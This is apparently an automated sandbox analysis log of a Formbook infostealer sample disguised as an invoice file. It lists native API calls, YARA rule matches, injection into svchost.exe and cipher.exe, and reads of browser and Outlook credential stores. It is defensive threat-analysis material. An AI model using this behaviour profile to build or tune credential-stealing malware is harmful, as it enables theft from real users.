            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_053A2D10
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_053A2DF0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2DD0 NtDelayExecution,LdrInitializeThunk,4_2_053A2DD0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_053A2C70
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2C60 NtCreateKey,LdrInitializeThunk,4_2_053A2C60
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_053A2CA0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2F30 NtCreateSection,LdrInitializeThunk,4_2_053A2F30
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2FB0 NtResumeThread,LdrInitializeThunk,4_2_053A2FB0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2FE0 NtCreateFile,LdrInitializeThunk,4_2_053A2FE0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_053A2E80
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_053A2EE0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2B60 NtClose,LdrInitializeThunk,4_2_053A2B60
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_053A2BA0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_053A2BF0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_053A2BE0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2AF0 NtWriteFile,LdrInitializeThunk,4_2_053A2AF0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2AD0 NtReadFile,LdrInitializeThunk,4_2_053A2AD0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A35C0 NtCreateMutant,LdrInitializeThunk,4_2_053A35C0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A39B0 NtGetContextThread,LdrInitializeThunk,4_2_053A39B0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2D00 NtSetInformationFile,4_2_053A2D00
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2DB0 NtEnumerateKey,4_2_053A2DB0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2C00 NtQueryInformationProcess,4_2_053A2C00
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2CF0 NtOpenProcess,4_2_053A2CF0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2CC0 NtQueryVirtualMemory,4_2_053A2CC0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2F60 NtCreateProcessEx,4_2_053A2F60
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2FA0 NtQuerySection,4_2_053A2FA0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2F90 NtProtectVirtualMemory,4_2_053A2F90
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2E30 NtWriteVirtualMemory,4_2_053A2E30
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2EA0 NtAdjustPrivilegesToken,4_2_053A2EA0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2B80 NtQueryInformationFile,4_2_053A2B80
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2AB0 NtWaitForSingleObject,4_2_053A2AB0
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A3010 NtOpenDirectoryObject,4_2_053A3010
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A3090 NtSetValueKey,4_2_053A3090
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A3D10 NtOpenProcessToken,4_2_053A3D10
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A3D70 NtOpenThread,4_2_053A3D70
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032D7B90 NtReadFile,4_2_032D7B90
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032D7A30 NtCreateFile,4_2_032D7A30
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032D7E70 NtAllocateVirtualMemory,4_2_032D7E70
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032D7D20 NtClose,4_2_032D7D20
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032D7C80 NtDeleteFile,4_2_032D7C80
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F640B1 CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00F640B1
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F58858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74B55590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00F58858
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F6545F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD22_2_02F03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD52_2_02F03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053705354_2_05370535
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054305914_2_05430591
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054224464_2_05422446
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054144204_2_05414420
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0541E4F64_2_0541E4F6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053707704_2_05370770
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053947504_2_05394750
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0536C7C04_2_0536C7C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538C6E04_2_0538C6E0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053601004_2_05360100
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540A1184_2_0540A118
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053F81584_2_053F8158
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054281CC4_2_054281CC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054241A24_2_054241A2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054301AA4_2_054301AA
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054020004_2_05402000
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542A3524_2_0542A352
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054303E64_2_054303E6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537E3F04_2_0537E3F0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054102744_2_05410274
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053F02C04_2_053F02C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537AD004_2_0537AD00
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540CD1F4_2_0540CD1F
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05388DBF4_2_05388DBF
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0536ADE04_2_0536ADE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05370C004_2_05370C00
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05360CF24_2_05360CF2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05410CB54_2_05410CB5
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05390F304_2_05390F30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B2F284_2_053B2F28
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05412F304_2_05412F30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E4F404_2_053E4F40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053EEFA04_2_053EEFA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537CFE04_2_0537CFE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05362FC84_2_05362FC8
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542EE264_2_0542EE26
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05370E594_2_05370E59
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542EEDB4_2_0542EEDB
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05382E904_2_05382E90
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542CE934_2_0542CE93
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053869624_2_05386962
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053729A04_2_053729A0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0543A9A64_2_0543A9A6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053728404_2_05372840
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537A8404_2_0537A840
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053568B84_2_053568B8
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0539E8F04_2_0539E8F0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542AB404_2_0542AB40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05426BD74_2_05426BD7
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0536EA804_2_0536EA80
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054275714_2_05427571
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054395C34_2_054395C3
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540D5B04_2_0540D5B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053614604_2_05361460
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542F43F4_2_0542F43F
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542F7B04_2_0542F7B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B56304_2_053B5630
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054216CC4_2_054216CC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0543B16B4_2_0543B16B
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0535F1724_2_0535F172
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A516C4_2_053A516C
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537B1B04_2_0537B1B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0541F0CC4_2_0541F0CC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542F0E04_2_0542F0E0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054270E94_2_054270E9
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053770C04_2_053770C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542132D4_2_0542132D
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0535D34C4_2_0535D34C
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B739A4_2_053B739A
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053752A04_2_053752A0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054112ED4_2_054112ED
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538B2C04_2_0538B2C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05421D5A4_2_05421D5A
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05427D734_2_05427D73
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05373D404_2_05373D40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538FDC04_2_0538FDC0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E9C324_2_053E9C32
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FCF24_2_0542FCF2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FF094_2_0542FF09
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05371F924_2_05371F92
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05333FD24_2_05333FD2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05333FD54_2_05333FD5
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FFB14_2_0542FFB1
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05379EB04_2_05379EB0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054059104_2_05405910
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053799504_2_05379950
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538B9504_2_0538B950
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053DD8004_2_053DD800
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053738E04_2_053738E0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FB764_2_0542FB76
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538FB804_2_0538FB80
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053ADBF94_2_053ADBF9
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E5BF04_2_053E5BF0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05427A464_2_05427A46
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FA494_2_0542FA49
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E3A6C4_2_053E3A6C
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0541DAC64_2_0541DAC6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B5AA04_2_053B5AA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05411AA34_2_05411AA3
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540DAAC4_2_0540DAAC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C16D04_2_032C16D0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032DA1204_2_032DA120
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BAB604_2_032BAB60
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BCAE04_2_032BCAE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BC8B74_2_032BC8B7
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BC8C04_2_032BC8C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C31EC4_2_032C31EC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C31F04_2_032C31F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 280 times
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: String function: 00F28B40 appears 42 times
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: String function: 00F20D27 appears 70 times
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: String function: 00F07F41 appears 35 times
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: String function: 0535B970 appears 280 times
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: String function: 053A5130 appears 58 times
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: String function: 053DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: String function: 053EF290 appears 105 times
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: String function: 053B7E54 appears 111 times
            Source: PI No 20000814C.exe, 00000000.00000003.2071812647.00000000042B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PI No 20000814C.exe
            Source: PI No 20000814C.exe, 00000000.00000003.2068613058.000000000440D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PI No 20000814C.exe
            Source: PI No 20000814C.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Rule metadata for Windows_Trojan_Formbook_1112e116 (identical for all ten matches above): reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6A2D5 GetLastError,FormatMessageW,0_2_00F6A2D5
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F58713 AdjustTokenPrivileges,CloseHandle,0_2_00F58713
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F58CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F58CC3
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F6B59E
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F7F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F7F121
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F04FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F04FE9
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | File created: C:\Users\user\AppData\Local\Temp\aut81DC.tmp
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003671000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2413736720.0000000003646000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4520210070.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2413833307.0000000003667000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4520210070.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PI No 20000814C.exe | Virustotal: Detection: 41%
            Source: PI No 20000814C.exe | ReversingLabs: Detection: 39%
            Source: unknown | Process created: C:\Users\user\Desktop\PI No 20000814C.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe | Process created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe"
            Source: C:\Windows\SysWOW64\cipher.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Sections loaded: iphlpapi.dll, mpr.dll, userenv.dll, uxtheme.dll, version.dll, wininet.dll, winmm.dll, wsock32.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
            Source: C:\Windows\SysWOW64\cipher.exe | Sections loaded: ntdsapi.dll, efsutil.dll, feclient.dll, dsrole.dll, ncrypt.dll, iertutil.dll, ntasn1.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Windows\SysWOW64\cipher.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\cipher.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4522417554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4520103554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: cipher.pdbGCTL source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: cipher.pdb source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
